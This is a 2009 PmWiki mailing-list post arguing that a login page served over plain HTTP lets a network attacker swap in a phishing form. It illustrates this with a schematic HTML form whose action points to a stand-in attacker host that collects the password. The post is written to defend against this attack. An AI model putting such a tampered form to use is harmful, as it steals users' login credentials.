[pmwiki-users] security (again!)

Olle ollebe at student.chalmers.se
Mon Mar 9 16:23:58 CDT 2009

Agreed, but much more important is the fact that the user knows that he is
seeing the real login page. Without true HTTPS (with a trusted certificate)
the user don't know if his connection has been tampered with so that he's
visiting a phising site. That phising site could look just like the original,
and seem to be located at the same URL. But it could send the password to the
attacker's web application instead of to the PmWiki.

Like this:
Original page at adress http://mywiki.somewhery6ne6un4ue.org/wiki/pmwiki.php:
                                         ^ Notice there's no httpS in that URL

<form action="https://mywiki.somewhere.org/wiki/pmwiki.php">  Your password is
SOO secure, coz i'm using HTTPS!!11
<input bla bla ....
</form>

Gets modified, while on the network, to the phising page, which still seems to
be at http://mywiki.somewhere.org/wiki/pmwiki.php:

<form action="http://attacker.evilstuff45yn45yuns3.com/wiki/pmwiki.php">  Your
password is SOO secure, co< i'm using HTTPS!!11
<input bla bla..  ...
</form>

And the attacker would get the password.

/Olle Bergkvist